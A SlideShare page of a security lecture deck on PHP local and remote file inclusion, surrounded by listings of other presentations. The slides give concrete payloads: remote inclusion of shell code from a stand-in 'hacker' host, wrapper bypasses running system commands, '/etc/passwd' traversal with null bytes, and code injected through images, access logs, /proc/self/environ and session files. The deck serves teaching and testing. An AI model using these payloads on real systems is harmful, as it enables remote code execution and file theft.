Михаил Фирстов, profile picture
Uploaded byМихаил Фирстов
PDF, PPTX1,260 views

LFI

This document discusses local file inclusion (LFI) and remote file inclusion (RFI) vulnerabilities. LFI occurs when a web application includes local files specified by the user through parameters, allowing execution of arbitrary code. RFI is similar but allows inclusion of remote files through URLs. Exploitation techniques discussed include using wrappers and filters to bypass protections, uploading files containing PHP code, and accessing log and session files.

Embed presentation

Download as PDF, PPTX
LFI/RFI Local/Remote File Inclusion
WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php index.php <?php echo "123"; help.php User can set file with code, which will be included (executed or just printed out)
WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php <?php echo "123"; index.php help.php User can set file with code, which will be included (executed or just printed out)
WTF is LFI/RFI? <?php include $_GET['page']; ?> 123 User can set file with code, which will be included (executed or just printed out) <?php echo "123"; index.php help.php
PHP functions • include • include_once • require • require_once
So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php 123123 <?php echo "123123"; ... shell.txt
LFI or RFI? Path in function before user's input? include('/tmp/'.$file) or include($file.'.php') Allow_url_fopen False True Allow_url_include False True RFILFI
RFI exploitation Simple, via site with your code ... include $_GET['url'].'.txt'; ... index.php /url=http://hacker/shell <?php system('uname -a'); ... shell.txt Linux ...
RFI exploitation Using wrappers (see SSRF) ... include $_GET['url'].'.txt'; ... index.php /url=data:,<?php system('id'); ?># id=1001 (www-data)... Slice path with "#" or "?" or use data:text/plain;base64,PD9wa..
RFI exploitation Protocol filter bypass using wrappers ... if (substr($_GET['url'], 0, 4) != 'http') { include $_GET['url']; } index.php /url=zlib:http://site/shell.php id=1001 (www-data)...
RFI exploitation Read files via php:// wrapper ... include $_GET['file']; ... index.php ?file=php://filter/ convert.base64-encode/ resource=index.php PD9waHA... base64("<?php...
LFI exploitation Require any local file ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=../../etc/passwd%00 Null byte work only with magic_quotes_gpc=off Try to use slashes technique ///[~4096]///.php (old php version)
LFI exploitation Upload file (probably image) with php-code and require it! ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=./uploads/images/1.jpg%00 Insert php code in EXIF tags or use PNG IDAT chunks technique ... <?php system('id'); ?> ... 1.jpg
LFI exploitation Find log file and insert your code via special crafted request ... include '/var/www/'.$_GET['file']; ... index.php ?file=../../../var/log/ apache2/access.log Many apps has log files with user's data from incoming requests, mail for example 1.4.7.7 - - [28/Mar/2016:10:22:04 -0300] "GET /?a=<?=@`$c`?> HTTP/1.0" 200 access.log ?a=<?@`$c`?>
LFI exploitation use ProcFS features ... include '/var/www/'.$_GET['file']; ... index.php /proc/self/fd/[0-9] apache log files located at 2 and 7 ... USER_AGENT=<?php system('id'); ?> ... environ ?file=../../proc/slef/environ%00 ... User-Agent: <?php system('id'); ?>
LFI exploitation Use session files ... $_SESSION['var'] = $_GET['var']; include '/var/www/'.$_GET['file']; ... index.php ?var=<?php phpinfo(); ? >&file=../../tmp/ sess_blablablabla blablablabla - PHPSESSID value
LFI exploitation phpinfo trick ... include '/var/www/'.$_GET['file']; ... index.php ... phpinfo(); ... i.php 1. Send $_FILE with shell.php 2. Parse temp filename, without closing socket 3. include file using temp file name

More Related Content

PDF
LFI to RCE
byn|u - The Open Security Community
 
PDF
Hacking routers as Web Hacker
byМихаил Фирстов
 
PDF
How to Prevent RFI and LFI Attacks
byImperva
 
PDF
Local File Inclusion to Remote Code Execution
byn|u - The Open Security Community
 
PDF
Remote File Inclusion (RFI) Vulnerabilities 101
byImperva
 
PDF
LFI to RCE Exploit with Perl Script
byPrathan Phongthiproek
 
PPTX
Directory Traversal & File Inclusion Attacks
byRaghav Bisht
 
PPTX
File inclusion
byAaftabKhan14
 
LFI to RCE
byn|u - The Open Security Community
 
Hacking routers as Web Hacker
byМихаил Фирстов
 
How to Prevent RFI and LFI Attacks
byImperva
 
Local File Inclusion to Remote Code Execution
byn|u - The Open Security Community
 
Remote File Inclusion (RFI) Vulnerabilities 101
byImperva
 
LFI to RCE Exploit with Perl Script
byPrathan Phongthiproek
 
Directory Traversal & File Inclusion Attacks
byRaghav Bisht
 
File inclusion
byAaftabKhan14
 

What's hot

PDF
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
byIsmail Tasdelen
 
PDF
Lean Php Presentation
byAlan Pinstein
 
PPTX
PHP in one presentation
byMilad Rahimi
 
PPT
Bypass file upload restrictions
byMukesh k.r
 
PPT
Php
byanandha ganesh
 
PPS
PHP - History, Introduction, Summary, Extensions and Frameworks
byRoyston Olivera
 
PPTX
Php technical presentation
bydharmendra kumar dhakar
 
PPT
Php Presentation
byManish Bothra
 
PDF
PHP
byMomentum Design Lab
 
PPT
01 Php Introduction
byGeshan Manandhar
 
PPTX
Introduction to PHP
byCollaboration Technologies
 
PPTX
php
byajeetjhajharia
 
PPT
Introduction To PHP
byShweta A
 
PDF
A History of PHP
byXinchen Hui
 
PPTX
Lfi
bypenetration Tester
 
PPT
PHP - Introduction to PHP Fundamentals
byVibrant Technologies & Computers
 
PDF
Introduction to php web programming - get and post
bybaabtra.com - No. 1 supplier of quality freshers
 
PDF
Introduction to PHP
byBradley Holt
 
PPT
PHP complete reference with database concepts for beginners
byMohammed Mushtaq Ahmed
 
PPTX
Introduction to php
byTaha Malampatti
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
byIsmail Tasdelen
 
Lean Php Presentation
byAlan Pinstein
 
PHP in one presentation
byMilad Rahimi
 
Bypass file upload restrictions
byMukesh k.r
 
Php
byanandha ganesh
 
PHP - History, Introduction, Summary, Extensions and Frameworks
byRoyston Olivera
 
Php technical presentation
bydharmendra kumar dhakar
 
Php Presentation
byManish Bothra
 
PHP
byMomentum Design Lab
 
01 Php Introduction
byGeshan Manandhar
 
Introduction to PHP
byCollaboration Technologies
 
php
byajeetjhajharia
 
Introduction To PHP
byShweta A
 
A History of PHP
byXinchen Hui
 
Lfi
bypenetration Tester
 
PHP - Introduction to PHP Fundamentals
byVibrant Technologies & Computers
 
Introduction to php web programming - get and post
bybaabtra.com - No. 1 supplier of quality freshers
 
Introduction to PHP
byBradley Holt
 
PHP complete reference with database concepts for beginners
byMohammed Mushtaq Ahmed
 
Introduction to php
byTaha Malampatti
 

Viewers also liked

PDF
Client side
byМихаил Фирстов
 
PDF
Sql-Injection
byМихаил Фирстов
 
PDF
Race condition
byМихаил Фирстов
 
PPTX
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
byJacqueline Vickery
 
PDF
Race condition
byYuk SeungChan
 
PPT
Attacking MongoDB
byМихаил Фирстов
 
PDF
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
byDefcon Moscow
 
PPT
Mongo db eng
byМихаил Фирстов
 
PPTX
Sunny on Foody
bymrp4
 
PDF
Le piattaforme per il social business
bypiero itta
 
PDF
Cyberfolio 2007 - Lean.Joy
byLeandro Rangel
 
PDF
Prezi #hotelvertrieb#ecommerce#SEO_2021
byAnsgar Jahns
 
PPT
Intestazione
byrifugiati
 
PDF
PHP
byandreluizlc
 
PDF
Wordpress Security Optimization (Basic)
byIrvan R-ID
 
PPT
L1 seeingthings
byBoat Dock
 
PDF
parameter tampering
byIlsun Choi
 
PDF
Quick Wins
byHighLoad2009
 
PDF
Domanda protocollata
bynoicattaroweb
 
PDF
M Power
byChris Direduryan
 
Client side
byМихаил Фирстов
 
Sql-Injection
byМихаил Фирстов
 
Race condition
byМихаил Фирстов
 
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
byJacqueline Vickery
 
Race condition
byYuk SeungChan
 
Attacking MongoDB
byМихаил Фирстов
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
byDefcon Moscow
 
Mongo db eng
byМихаил Фирстов
 
Sunny on Foody
bymrp4
 
Le piattaforme per il social business
bypiero itta
 
Cyberfolio 2007 - Lean.Joy
byLeandro Rangel
 
Prezi #hotelvertrieb#ecommerce#SEO_2021
byAnsgar Jahns
 
Intestazione
byrifugiati
 
PHP
byandreluizlc
 
Wordpress Security Optimization (Basic)
byIrvan R-ID
 
L1 seeingthings
byBoat Dock
 
parameter tampering
byIlsun Choi
 
Quick Wins
byHighLoad2009
 
Domanda protocollata
bynoicattaroweb
 
M Power
byChris Direduryan
 

Similar to LFI

DOCX
Web-servers & Application Hacking
byRaghav Bisht
 
PPTX
Secure PHP Coding - Part 1
byVinoth Kumar
 
PDF
File Inclusion.pdf
byOkan YILDIZ
 
PDF
Php vulnerability presentation
bySqa Enthusiast
 
PPTX
Lfi rfi
byIlan Mindel
 
PPTX
CodeIgniter i18n Security Flaw
byAbbas Naderi
 
PDF
PHP LFI to Arbitrary Code Execution via rfc1867 file upload temporary files
byAttaporn Ninsuwan
 
PDF
CNIT 129S: 10: Attacking Back-End Components
bySam Bowne
 
PDF
Teaching Your WAF New Tricks
byRobert Rowley
 
ODP
How secure is your code?
byMikee Franklin
 
PPTX
Introduction to Penetration Testing
byAndrew McNicol
 
PPTX
Web-App Remote Code Execution Via Scripting Engines
byc0c0n - International Cyber Security and Policing Conference
 
PPTX
On secure application of PHP wrappers
byPositive Hack Days
 
PDF
Php through the eyes of a hoster confoo
byCombell NV
 
PDF
Php through the eyes of a hoster phpbnl11
byCombell NV
 
PDF
Php through the eyes of a hoster
byCombell NV
 
PDF
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
byDefconRussia
 
KEY
Php through the eyes of a hoster: PHPNW10
byCombell NV
 
PDF
php secure
byahmed zaichi
 
PDF
Nginx pres
byJames Fuller
 
Web-servers & Application Hacking
byRaghav Bisht
 
Secure PHP Coding - Part 1
byVinoth Kumar
 
File Inclusion.pdf
byOkan YILDIZ
 
Php vulnerability presentation
bySqa Enthusiast
 
Lfi rfi
byIlan Mindel
 
CodeIgniter i18n Security Flaw
byAbbas Naderi
 
PHP LFI to Arbitrary Code Execution via rfc1867 file upload temporary files
byAttaporn Ninsuwan
 
CNIT 129S: 10: Attacking Back-End Components
bySam Bowne
 
Teaching Your WAF New Tricks
byRobert Rowley
 
How secure is your code?
byMikee Franklin
 
Introduction to Penetration Testing
byAndrew McNicol
 
Web-App Remote Code Execution Via Scripting Engines
byc0c0n - International Cyber Security and Policing Conference
 
On secure application of PHP wrappers
byPositive Hack Days
 
Php through the eyes of a hoster confoo
byCombell NV
 
Php through the eyes of a hoster phpbnl11
byCombell NV
 
Php through the eyes of a hoster
byCombell NV
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
byDefconRussia
 
Php through the eyes of a hoster: PHPNW10
byCombell NV
 
php secure
byahmed zaichi
 
Nginx pres
byJames Fuller
 

Recently uploaded

PPTX
'Colonial Mentality and Social Identity in Karma by Khushwant Singh'
byKrishnarajsinh Parmar
 
PDF
Fast Followers Project, Embedding Net Zero into Wakefield Metropolitan Distri...
byAssociation for Project Management
 
PDF
Aminoglycosides.pdf for B.Pharmacy Medicinal Chemistry-III (BP601T), GPAT, a...
bymominzarinamdnajeeb
 
PPTX
Drugs modulating serotonergic system.pptx
byNorman Arockiaraj G
 
PPTX
West Hatch High School - GCSE Art Presentation
byWestHatch
 
PPTX
TLE 8 W1 Q4 D2.pptx COMMON FLOOR PLAN SYMBOLS PLUMBING SYMBOLS
byraquelanaaltres1
 
PPTX
West Hatch High School - GCSE Spanish Presentation
byWestHatch
 
PPTX
Appreciations - Jan 26 01.pptxkkkmmkmkmkmkm
bypreetheshparmar
 
PDF
U.S. Departments of Education and Treasury fact sheet
byMebane Rash
 
PPTX
Mohan - "A man of silence and authority"
bynidhibachauhan46
 
PPTX
Toba Tek Singh - Visualising Partition through Manto's Lens
bymiraljoshi48
 
PPTX
Master of Punjabi Short Story "kartar singh duggal
bybhautikbharwad4
 
PDF
West Hatch High School - GCSE French Specification
byWestHatch
 
PPTX
Central Line Associated Bloodstream Infection
bynabinabhaila40
 
PPTX
MENTAL STATUS EXAMINATION Part-1.Shilpa hotakar.pptx
bySHILPA HOTAKAR
 
PDF
Information about the author Shashi Deshpande
bydarshanaparmar6522
 
PPTX
Unit 3- Culture.pptx....................
byAkanksha Kotangale
 
PPTX
Grade 9 and 10 learner Fuse and Switch.pptx
byCarlJohnCabayao
 
PPTX
Poster Based Ethical Reflection - Dharma and Values Poster.pptx
byRajshreeBeneymadoo
 
PDF
West Hatch High School - GCSE Media Specification
byWestHatch
 
'Colonial Mentality and Social Identity in Karma by Khushwant Singh'
byKrishnarajsinh Parmar
 
Fast Followers Project, Embedding Net Zero into Wakefield Metropolitan Distri...
byAssociation for Project Management
 
Aminoglycosides.pdf for B.Pharmacy Medicinal Chemistry-III (BP601T), GPAT, a...
bymominzarinamdnajeeb
 
Drugs modulating serotonergic system.pptx
byNorman Arockiaraj G
 
West Hatch High School - GCSE Art Presentation
byWestHatch
 
TLE 8 W1 Q4 D2.pptx COMMON FLOOR PLAN SYMBOLS PLUMBING SYMBOLS
byraquelanaaltres1
 
West Hatch High School - GCSE Spanish Presentation
byWestHatch
 
Appreciations - Jan 26 01.pptxkkkmmkmkmkmkm
bypreetheshparmar
 
U.S. Departments of Education and Treasury fact sheet
byMebane Rash
 
Mohan - "A man of silence and authority"
bynidhibachauhan46
 
Toba Tek Singh - Visualising Partition through Manto's Lens
bymiraljoshi48
 
Master of Punjabi Short Story "kartar singh duggal
bybhautikbharwad4
 
West Hatch High School - GCSE French Specification
byWestHatch
 
Central Line Associated Bloodstream Infection
bynabinabhaila40
 
MENTAL STATUS EXAMINATION Part-1.Shilpa hotakar.pptx
bySHILPA HOTAKAR
 
Information about the author Shashi Deshpande
bydarshanaparmar6522
 
Unit 3- Culture.pptx....................
byAkanksha Kotangale
 
Grade 9 and 10 learner Fuse and Switch.pptx
byCarlJohnCabayao
 
Poster Based Ethical Reflection - Dharma and Values Poster.pptx
byRajshreeBeneymadoo
 
West Hatch High School - GCSE Media Specification
byWestHatch
 

LFI

  • 1.
  • 2.
    WTF is LFI/RFI? <?php include$_GET['page']; ?> GET /page=help.php index.php <?php echo "123"; help.php User can set file with code, which will be included (executed or just printed out)
  • 3.
    WTF is LFI/RFI? <?php include$_GET['page']; ?> GET /page=help.php <?php echo "123"; index.php help.php User can set file with code, which will be included (executed or just printed out)
  • 4.
    WTF is LFI/RFI? <?php include$_GET['page']; ?> 123 User can set file with code, which will be included (executed or just printed out) <?php echo "123"; index.php help.php
  • 5.
    PHP functions • include •include_once • require • require_once
  • 6.
    So, RFI? With RFIyou can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
  • 7.
    So, RFI? With RFIyou can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
  • 8.
    So, RFI? With RFIyou can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php 123123 <?php echo "123123"; ... shell.txt
  • 9.
    LFI or RFI? Pathin function before user's input? include('/tmp/'.$file) or include($file.'.php') Allow_url_fopen False True Allow_url_include False True RFILFI
  • 10.
    RFI exploitation Simple, viasite with your code ... include $_GET['url'].'.txt'; ... index.php /url=http://hacker/shell <?php system('uname -a'); ... shell.txt Linux ...
  • 11.
    RFI exploitation Using wrappers(see SSRF) ... include $_GET['url'].'.txt'; ... index.php /url=data:,<?php system('id'); ?># id=1001 (www-data)... Slice path with "#" or "?" or use data:text/plain;base64,PD9wa..
  • 12.
    RFI exploitation Protocol filterbypass using wrappers ... if (substr($_GET['url'], 0, 4) != 'http') { include $_GET['url']; } index.php /url=zlib:http://site/shell.php id=1001 (www-data)...
  • 13.
    RFI exploitation Read filesvia php:// wrapper ... include $_GET['file']; ... index.php ?file=php://filter/ convert.base64-encode/ resource=index.php PD9waHA... base64("<?php...
  • 14.
    LFI exploitation Require anylocal file ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=../../etc/passwd%00 Null byte work only with magic_quotes_gpc=off Try to use slashes technique ///[~4096]///.php (old php version)
  • 15.
    LFI exploitation Upload file(probably image) with php-code and require it! ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=./uploads/images/1.jpg%00 Insert php code in EXIF tags or use PNG IDAT chunks technique ... <?php system('id'); ?> ... 1.jpg
  • 16.
    LFI exploitation Find logfile and insert your code via special crafted request ... include '/var/www/'.$_GET['file']; ... index.php ?file=../../../var/log/ apache2/access.log Many apps has log files with user's data from incoming requests, mail for example 1.4.7.7 - - [28/Mar/2016:10:22:04 -0300] "GET /?a=<?=@`$c`?> HTTP/1.0" 200 access.log ?a=<?@`$c`?>
  • 17.
    LFI exploitation use ProcFSfeatures ... include '/var/www/'.$_GET['file']; ... index.php /proc/self/fd/[0-9] apache log files located at 2 and 7 ... USER_AGENT=<?php system('id'); ?> ... environ ?file=../../proc/slef/environ%00 ... User-Agent: <?php system('id'); ?>
  • 18.
    LFI exploitation Use sessionfiles ... $_SESSION['var'] = $_GET['var']; include '/var/www/'.$_GET['file']; ... index.php ?var=<?php phpinfo(); ? >&file=../../tmp/ sess_blablablabla blablablabla - PHPSESSID value
  • 19.
    LFI exploitation phpinfo trick ... include'/var/www/'.$_GET['file']; ... index.php ... phpinfo(); ... i.php 1. Send $_FILE with shell.php 2. Parse temp filename, without closing socket 3. include file using temp file name